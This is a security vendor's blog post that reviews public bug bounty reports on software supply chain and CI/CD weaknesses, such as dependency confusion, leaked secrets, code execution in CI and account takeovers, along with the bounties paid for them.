All blog posts

How much would enterprises spend for being made aware of a single supply chain vulnerability?

TL;DR – A lot they would!!!

Bug bounty has taken the world by storm. Large corporations pay bug bounty hunters for vulnerabilities found in their environment as a matter of course, paving the path for smaller sized companies that have also begun to understand the benefits of bug bounty programs.

The primary motivations driving organizations to set up bug bounty programs and to pay ethical hackers to find and report bugs are:

  • To secure their environments and prevent being forced to pay a large ransom to malicious attackers in the event of a breach
  •  To preserve their reputation, which in many cases, such as with financial institutions, is just as important (if not more) than preventing financial loss, as clients may lose confidence in the ability of institutions to protect their assets in the case of a data breach 

As companies develop more sophisticated defenses, attackers are forced to become more creative in order to find new avenues of attack. Supply chain attacks have become the latest  Software Development Life Cycle (SDLC) attack vector, having been identified by attackers as a weak unprotected link in the engineering environment. 

What is the software ‘supply chain’ and why is it being targeted?

The software supply chain consists of various components and processes that are involved in the process of developing and delivering software as a part of the SDLC, including code/artifact repositories, code build processes, and code testing and deployment systems. The supply chain is being singled out for attack as it takes in code and configuration files, and builds them by executing scripts and commands. This potentially allows malicious actors, who have gained access to the build environment to execute malicious code or obtain access to sensitive resources such as passwords and secrets, eventually enabling malicious attackers to reach and impact the production environment. 

For detailed context around the most common attack vectors in the CI/CD ecosystem, refer to the “Top 10 CI/CD Security Risks” framework.

Supply chain attack vector and the bug bounty ecosystem

The subject of our research when writing this blog was to understand whether or not organizations with bug bounty programs are willing to make an investment in supply chain vulnerabilities as part of these programs. For this, we analyzed public bug bounty reports taken from the HackerOne directory over the past two years. 

The results of this analysis were unequivocal – without having visibility to private bug bounty reports, or reports outside of the “HackerOne” platform, we saw hundreds of reports – with bounties ranging from a few hundred dollars to several with payouts of over 40,000(!). 

In this blog we will examine the ways in which bug hunters and malicious actors alike target and attack the supply chain, and assess the value of vulnerabilities they discover for security-minded companies who understand the worth of this work.

Dependency confusion

At the beginning of 2021 Alex Birsan, a security researcher and bug hunter, found a weakness in the process used by package managers to download external third party dependencies. Detailed information can be found in Alex’s blog, but for those who want a TLDR, most package managers download resources from both publicly managed and private repositories. The problem arises when a package resides in both types of repositories. How does the package manager decide where to download the package from? What considerations are taken into account? You might think that the package manager would prefer the package in the private repository, but Alex found out that package managers select the latest package version without attaching any importance to the type of repository in which the package is found.

This behavior allows attackers to upload a later version of a package including malicious code to the repository, which may result in the package manager downloading the compromised version, allowing poisoned code to flow through the CI/CD pipeline and reach the production environment.

Shopify, Apple and Paypal each paid Alex $30,000 (!) for a ‘dependency confusion’ bug that he found in their systems! Why? Because they knew that this type of attack allowed him to execute malicious code and access their internal CI systems responsible for deploying code to production, including the necessary permissions and access to perform these actions.

Dependency confusion can also occur in areas other than standard package managers. For example, read how Kamil Vavra found a dependency confusion in the WordPress ecosystem based on Alex’s research, and was awarded for his efforts.

For more on dependency confusion attacks see a blog on the subject that I wrote

Additional references

Access to the code base

Scanning all code..

Findings:
  controller.js
     javascript.sqli
        Detected SQL statement that is tainted by `event` object. This could lead to SQL injection

For a bug hunter, gaining access to a company’s code base is a dream come true. This allows them to perform a full source audit of the system instead of only a blackbox assessment, providing insights into the system’s inner workings, discovering all the little tricks and bypasses that developers use, passwords submitted by mistake into the code base, and generally providing a wealth of information about technologies used by the product. 

Hackers will gladly take full advantage of access to a code base, depending on their motivation. Ethical hackers will use access to a code base to help a company identify and fix vulnerabilities, and may be rewarded for their efforts. On the other hand, malicious hackers will try and further infiltrate the company’s systems, seeking to gain a critical advantage over the company’s defenses.

In 2021 Augusto Zanellato reviewed the publicly available macOS application of the Shopify app. He found that an “.env” file was introduced (probably by mistake) during the automated CI/CD build process and was included in the released package. This file included a GitHub authentication token which had permission to pull all repository data and modify files in the repository.

Shopify rewarded Augusto with $50,000 for his efforts.

Additional examples of leaked credentials which provided hackers access to internal code, and the bounty awarded to those who found the vulnerabilities include:

Secrets stored in public sources

In the previous section we demonstrated how attackers can gain access to the source code, but what if they already have gained access to the code? Many companies use open source or publically available code that has been published on the internet, and which is freely available without restriction. This could either be public code/artifact  repositories or even mobile applications in the various app stores which can be decompiled and reverted to their source code. Developers continuously adding code to these sources risk accidently exposing secrets and confidential data to the public domain, where it will be accessible to everyone.

We have encountered numerous instances of secrets found in an organization’s public repositories, leading to compromise of the entire organization. 

Public code and data sources are usually found in source control management systems such as GitHub, GitLab, and Bitbucket repositories, but they can also be found in continuous integration (CI) log files. For example, Ivan Vyshnevskyi (aka sainaen) found out that a ‘HackerOne’ employee’s GitHub personal access token was exposed in Travis CI build logs. HackerOne paid $2,000 for this particular disclosure.

In another example, a mobile app released to the Google Play Store included leaked sensitive credentials for the Cloudinary service. Sergey Toshin (aka bagipro) found a disclosure of all uploads to Cloudinary via a hardcoded api secret in an Android app which he reported to Reverb, who subsequently paid him $750. This breach did not directly affect the CI/CD ecosystem, but could have been avoided by using secret scanning to check for sensitive information before publishing the app to the app store.

Read a great blog on this subject by Tillson Gallowayhttps://tillsongalloway.com/finding-sensitive-information-on-github/index.html

Summing up, we found that companies paid between $100- $15,000 per leaked secret, depending on its impact. For example see the following cases:  

Running code in CI systems

Executing code in a CI system is highly dangerous and should be avoided at all cost.

In 2020 Alex Chapman showed how to exploit a vulnerability found in the GitLab Runner when parsing a CI configuration file, which allowed an attacker to execute code in the underlying CI system in order to access different secrets and network environments. For his efforts, Alex received a bounty of $6500 from GitLab.

I have researched different avenues to execute code in the CI, such as by executing code through tools running in the CI or by attacking the package managers themselves (see also Video from securityfest), and have been rewarded with a bounty for my efforts.

File upload mechanisms have become infamous for being susceptible to remote command execution; In 2017, Jobert Abma found a Command injection through GitLab import file. He reported the issue to GitLab and received a $2000 bounty. In 2022 while researching import mechanisms, William Bowling discovered the ability to read any file in GitLab, a vulnerability which brought him a bounty of $29,500 (A good analysis can be found here). Later on he found a decompression bug in the same area for which he was rewarded with an additional bounty of $33,510!

GitLab understands the impact and importance of supply chain vulnerabilities, and the need to safeguard against them. Consequently they reward research and are willing to generously compensate bounty hunters when they detect bugs in their environment.

For more interesting reports see:

CI Account takeovers 

This last vector is a relatively new attack vector – one that didn’t even exist when I began my bounty hunting career – SaaS account takeovers.

An account takeover attack refers to a situation where an attacker gains authorized access to an account on a SaaS platform which previously belonged to someone else. This can happen if the attacker is able to gain control over orphaned resources, such as a username or domain that are no longer in use by their original owner. 

So how can account takeovers happen in CI systems? Package managers or other resources that are downloaded from CI systems retrieve assets from source code management systems. If users delete or rename their SCM account, for example their GitHub account or organization, an attacker could legally register the deleted account on their behalf and upload a malicious asset. The same thing could happen to other package management systems such as npm, maven and so on.

You can read further in this excellent article from Aviad Gershon and Elad Rapoport about attacking the supply chain by a simple rename.

Some examples include:

Key takeaways

Supply chain attack vectors are increasingly becoming a major area of focus for all involved entities: Hackers, Bounty hunters and defenders. All parties understand the major consequences and the potential damage in discovering or exploiting such a vector. 

Organizations across all levels of maturity should consider how they wish to address this concern; 

Obviously, detecting vulnerabilities through bug bounty programs is a highly effective way for detecting high impact, highly exploitable vulnerabilities. 

However, as we witnessed, many of these vulnerabilities could be easily prevented through a simple analysis of system configuration and other essential CI/CD security measures and controls.

To learn more about how Cider Security assists organizations in adding the proper security measures along the software supply chain.

Happy bounty hunting to us all !!

Cider Security has been acquired by Palo Alto Networks